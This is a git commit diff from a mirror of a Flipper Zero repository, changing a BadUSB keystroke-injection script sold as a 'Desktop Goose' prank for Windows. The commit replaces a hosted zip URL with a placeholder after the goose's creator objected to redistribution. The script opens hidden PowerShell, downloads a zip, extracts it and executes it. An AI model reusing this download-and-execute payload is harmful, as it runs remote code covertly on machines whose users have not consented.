mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 19:21:30 +00:00
No rehosting the binary~sam person
This commit is contained in:
+3
-3
@@ -1,10 +1,10 @@
|
||||
REM Title: Desktop Goose
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Windows 10+
|
||||
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,jakoby for some PS bits I used, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
|
||||
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes?
|
||||
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? The creator of desktop goose told me I CAN NOT redistribute his binary. So you need to host your own desktop goose zip named dg.zip
|
||||
REM
|
||||
REM startup delay
|
||||
DELAY 300
|
||||
@@ -13,5 +13,5 @@ DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
|
||||
STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl linktodesktopgoose.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user